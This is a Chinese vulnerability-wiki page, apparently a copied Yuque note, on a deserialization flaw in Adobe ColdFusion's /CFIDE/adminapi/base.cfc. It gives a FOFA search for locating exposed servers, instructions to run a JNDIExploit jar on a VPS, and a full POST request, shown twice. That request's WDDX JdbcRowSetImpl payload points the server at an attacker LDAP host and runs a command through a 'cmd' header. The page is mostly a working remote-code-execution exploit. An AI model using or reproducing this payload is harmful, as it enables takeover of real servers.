fofamini-wiki

登录白背景

源码

Adobe ColdFusion base存在反序列化漏洞

一、漏洞简介

Adobe ColdFusion是美国奥多比（Adobe）公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。Adobe ColdFusion存在代码问题漏洞，该漏洞源于受到不受信任数据反序列化漏洞的影响，攻击者通过漏洞可以实现代码执行，可导致服务器失陷，获取服务器权限。

二、影响版本

Adobe ColdFusion

三、资产测绘

fofaapp="Adobe-ColdFusion"
特征

四、漏洞复现

将JNDIExploit-1.4-SNAPSHOT.jar上传到VPS

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i VPSIP

JNDIExploit-1.4-SNAPSHOT.jar

POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 400
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
cmd: id

argumentCollection=
<wddxPacket version='1.0'>
    <header/>
    <data>
        <struct type='xcom.sun.rowset.JdbcRowSetImplx'>
            <var name='dataSourceName'>
                <string>ldap://xx:1389/Basic/TomcatEcho</string>
            </var>
            <var name='autoCommit'>
                <boolean value='true'/>
            </var>
        </struct>
    </data>
</wddxPacket>

原文: https://www.yuque.com/xiaokp7/ocvun2/fgv33rttozokud2y

# Adobe ColdFusion base存在反序列化漏洞

# 一、漏洞简介
Adobe ColdFusion是美国奥多比（Adobe）公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。Adobe ColdFusion存在代码问题漏洞，该漏洞源于受到不受信任数据反序列化漏洞的影响，攻击者通过漏洞可以实现代码执行，可导致服务器失陷，获取服务器权限。

# 二、影响版本

- Adobe ColdFusion

# 三、资产测绘

- fofa`app="Adobe-ColdFusion"`
- 特征

![image.png](./img/We4JPh9DvATrjWGY/1706803881026-6970e736-4d4a-4857-a628-36a7122f0d7b-524274.png)

# 四、漏洞复现
将`JNDIExploit-1.4-SNAPSHOT.jar`上传到VPS
```
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i VPSIP
```
[JNDIExploit-1.4-SNAPSHOT.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222141540-6df38a59-816c-4845-8f07-80f2ae17f87a.jar?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fjar%2F1622799%2F1709222141540-6df38a59-816c-4845-8f07-80f2ae17f87a.jar%22%2C%22name%22%3A%22JNDIExploit-1.4-SNAPSHOT.jar%22%2C%22size%22%3A42671630%2C%22ext%22%3A%22jar%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u35d23331-e044-42c4-b74f-553d0397771%22%2C%22taskType%22%3A%22transfer%22%2C%22type%22%3A%22application%2Fjava-archive%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22u70305b22%22%2C%22card%22%3A%22file%22%7D)
![image.png](./img/We4JPh9DvATrjWGY/1702470660563-8242e318-75b7-4793-8af4-c1b8655efbef-511683.png)
```
POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 400
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
cmd: id

argumentCollection=
<wddxPacket version='1.0'>
    <header/>
    <data>
        <struct type='xcom.sun.rowset.JdbcRowSetImplx'>
            <var name='dataSourceName'>
                <string>ldap://xx:1389/Basic/TomcatEcho</string>
            </var>
            <var name='autoCommit'>
                <boolean value='true'/>
            </var>
        </struct>
    </data>
</wddxPacket>
```
![image.png](./img/We4JPh9DvATrjWGY/1706803984143-eee4f7f4-f2c4-43b8-a8b7-a987552640ce-686159.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fgv33rttozokud2y>